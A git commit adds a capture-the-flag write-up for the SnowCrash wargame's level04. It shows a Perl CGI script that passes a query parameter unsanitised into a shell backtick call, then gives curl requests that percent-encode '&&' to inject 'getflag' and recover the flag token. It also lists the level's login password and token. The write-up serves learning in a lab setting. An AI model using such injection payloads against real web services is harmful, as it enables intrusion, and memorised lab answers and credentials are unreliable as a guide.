refactor(maiboyer): adding the maibaoyer directory
This commit is contained in:
Raphael
parent
db7f1343c5
commit
ab55d4de10
48 changed files with 0 additions and 0 deletions
96
maiboyer/level04/README.md
Normal file
96
maiboyer/level04/README.md
Normal file
|
|
@ -0,0 +1,96 @@
|
|||
# Level 04
|
||||
|
||||
## how to login
|
||||
|
||||
username: level04
|
||||
|
||||
password: qi0maab88jeaj46qoumi7maus
|
||||
|
||||
## Goal
|
||||
|
||||
run `getflag` as user `flag04`
|
||||
|
||||
## Actually doing something
|
||||
|
||||
```bash
|
||||
level04@SnowCrash:~$ ll
|
||||
total 16
|
||||
dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./
|
||||
d--x--x--x 1 root users 340 Aug 30 2015 ../
|
||||
-r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout*
|
||||
-r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc*
|
||||
-rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl*
|
||||
-r-x------ 1 level04 level04 675 Apr 3 2012 .profile*
|
||||
```
|
||||
|
||||
Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl
|
||||
|
||||
```perl
|
||||
#!/usr/bin/perl
|
||||
# localhost:4747
|
||||
use CGI qw{param};
|
||||
print "Content-type: text/html\n\n";
|
||||
sub x {
|
||||
$y = $_[0];
|
||||
print `echo $y 2>&1`;
|
||||
}
|
||||
x(param("x"));
|
||||
```
|
||||
|
||||
This reeks of exploit
|
||||
|
||||
As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it
|
||||
|
||||
The issue is how it returns it...
|
||||
|
||||
It forward it to a shell string, and print the result.
|
||||
This is as secure as having a litteral endpoint that takes a command and return the result.
|
||||
|
||||
Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo`
|
||||
command we can run whatever we want
|
||||
|
||||
for example `getflag`
|
||||
|
||||
we want this
|
||||
```perl
|
||||
print `echo $y 2>&1`
|
||||
```
|
||||
to become
|
||||
```perl
|
||||
print `echo idk && getflag 2>&1`
|
||||
```
|
||||
|
||||
We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag`
|
||||
|
||||
but if we do it dumbly, nothing happens
|
||||
|
||||
```bash
|
||||
level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag'
|
||||
idk
|
||||
```
|
||||
|
||||
Why ?
|
||||
|
||||
Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it.
|
||||
|
||||
How ?
|
||||
|
||||
The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&`
|
||||
|
||||
lets replace it to get `idk%26%26getflag` and voila !
|
||||
|
||||
```bash
|
||||
level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag'
|
||||
GetExploited
|
||||
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
|
||||
```
|
||||
|
||||
lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path
|
||||
|
||||
```bash
|
||||
level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo'
|
||||
idk
|
||||
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
|
||||
```
|
||||
|
||||
Look mom, I recycle my stuff !
|
||||
Loading…
Add table
Add a link
Reference in a new issue